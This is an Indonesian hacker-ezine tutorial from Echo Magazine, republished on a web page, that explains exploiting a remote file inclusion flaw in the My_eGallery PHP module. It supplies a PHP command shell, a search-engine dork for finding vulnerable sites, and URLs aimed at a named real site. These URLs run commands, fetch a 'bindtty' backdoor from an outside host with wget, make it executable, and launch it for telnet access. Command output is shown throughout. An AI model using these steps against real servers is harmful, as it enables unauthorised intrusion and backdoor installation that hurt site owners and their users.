Copy Link
Add to Bookmark
Report

Echo Magazine Issue 05 Phile 0x006

eZine's profile picture
Published in 
Echo Magazine
 · 4 years ago

  

____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/


.OR.ID
ECHO-ZINE RELEASE
05

Author: juventini || juventini@kalteng.net
Online @ www.echo.or.id :: http://ezine.echo.or.id

My_eGallery Injection
=====================
Oleh:juventini

Bug ini mungkin sudah agak lama, tapi sumpah masih banyak yg bisa kita
mainkan hehhe..(itulah gunanya google kali yah). Bug ini terdapat pada
"My_eGallery", pada dasarnya hal ini terjadi ketika "intruder"
men-supply parameter(dalam bentuk kode php) pada My_eGallery site
target melalui web site "intruder".

=====Start PHP Code=========

<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
print_output();
?>

==========End===============

Nah..mari kita coba yah (mulai deh bagian menarik nya..hehehe),
pertama-tama upload PHP code
itu ke situs kamu(bisa dalam bentuk .txt). Atau kalo kamu males bisa
kalian ambil dari
http://www.geocities.com/java_sas/pascal.txt
Ok..sekarang mari kita buka situs favorit saya "www.google.com" (found
most everything here!!),
lalu kita masukkan keyword nya : allinurl:my_eGallery site:.com (.com
itu bisa diganti sesuai
dgn keinginan kalian,.net,.id,.tv,etc)...Hasilnya...!!! banyak kan..hehehe

Mari kita siapkan peralatan kita..apa yah? cuman browser kok, explorer
atau netscape:) simpel
kan? Nah kalo udah mari kita masukkan url yg kita dapatkan di google
tadi dan kita gabungkan
dengan letak php kode pada situs kita :

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.php?
basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=uname%20-a

mari kita amati dulu :
*http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.php
= adalah situs target dan direktori tempat my_eGallery

*http://www.geocities.com/java_sas/pascal.txt = adalah site intruder
dimana php kode tadi kita simpan
*cmd=uname%20-a = apa mesti saya kasih tahu? hehehehe

oke mari kita lihat apa yg browser hasilkan dari url tadi :

Linux server1.fastsecurehost.com 2.4.22-1.2174.nptlsmp #1 SMP Wed Feb 18
16:21:50 EST 2004 i686 i686 i386 GNU/Linux
waaaaaaaaaaaaaaaaa..hehehe di excute euyyy command nya..!!lalu biar
tambah menarik gimana kalo kita upload "bindtty" ke situs target,biar
kita bisa melakukan telnet kesitu :)

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.
php?basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=cd%20
/var/tmp%20;%20wget%20www.renjana.ws/~toa/bindtty

perhatikan : cmd=cd%20/var/tmp%20;%20wget%20www.renjana.ws/~toa/bindtty
mengingat kita bukan root maka upload file biasanya diperbolehkan di
direktori /var/tmp, lalu tinggak di wget deh bindtty(disini saya ambil
dari www.renjana.ws/~toa/bindtty)
Lihat apa yg dihasilkan browser :

--04:22:42-- http://www.renjana.ws/%7Etoa/bindtty
=> `bindtty'
Resolving www.renjana.ws... done.
Connecting to www.renjana.ws[66.111.56.80]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,380 [text/plain]

0K .......... ........ 100% 151.41 KB/s

04:22:43 (151.41 KB/s) - `bindtty' saved [19380/19380]

upssss...bisa euyyy :) 1/2 jalan neh udah hehehe..setelah bindtty telah
tersimpan di situs target sekarang kita hanya perlu menjalankannya, tapi
sebelumnya tentu saja kita ubah dulu permission nya:

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.
php?basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=cd%20
/var/tmp%20;%20chmod%20755%20bindtty

nah setelah ini baru deh bbisa kita running program bindtty nya :

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory
.php?basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=cd%20
/var/tmp%20;%20./bindtty

Dan di browser kamu akan terlihat pid dari bindtty itu..hehehe..sudah
jalan neh!! Sekarang buka deh telnet (kalo aku sih biasanya pake putty)
telnet situs target di port 4000 (berhubung bindtty di
www.renjana.ws/~toa/bindtty di set pada port 4000)
Nah jadi lebih enak kalo di telnet..hehehe
$bash id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
selanjutnya....? terserah anda donk...heheehhehe

Itu dulu dari yah..selamat berpetualang!!!

Penulis: juventini
Email: juventini@kalteng.net
Greetz to: My "Lovely" Girl (cit`z), all my "Tentor"(scut,pupet,etc),all
echo staff,
all my friends @Dalnet(aXal,mujie,Sitoboyan,C007,Banzai,etc),everybody
who know me..!!

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Francesco's profile picture
Francesco Arca (@Francesco)
14 Nov 2024
Congratulations :)

guest's profile picture
@guest
12 Nov 2024
It is very remarkable that the period of Atlantis’s destruction, which occurred due to earthquakes and cataclysms, coincides with what is co ...

guest's profile picture
@guest
12 Nov 2024
Plato learned the legend through his older cousin named Critias, who, in turn, had acquired information about the mythical lost continent fr ...

guest's profile picture
@guest
10 Nov 2024
الاسم : جابر حسين الناصح - السن :٤٢سنه - الموقف من التجنيد : ادي الخدمه - خبره عشرين سنه منهم عشر سنوات في كبرى الشركات بالسعوديه وعشر سنوات ...

lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
6 Nov 2024
Thank you! I've corrected the date in the article. However, some websites list January 1980 as the date of death.

guest's profile picture
@guest
5 Nov 2024
Crespi died i april 1982, not january 1980.

guest's profile picture
@guest
4 Nov 2024
In 1955, the explorer Thor Heyerdahl managed to erect a Moai in eighteen days, with the help of twelve natives and using only logs and stone ...

guest's profile picture
@guest
4 Nov 2024
For what unknown reason did our distant ancestors dot much of the surface of the then-known lands with those large stones? Why are such cons ...

guest's profile picture
@guest
4 Nov 2024
The real pyramid mania exploded in 1830. A certain John Taylor, who had never visited them but relied on some measurements made by Colonel H ...

guest's profile picture
@guest
4 Nov 2024
Even with all the modern technologies available to us, structures like the Great Pyramid of Cheops could only be built today with immense di ...
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT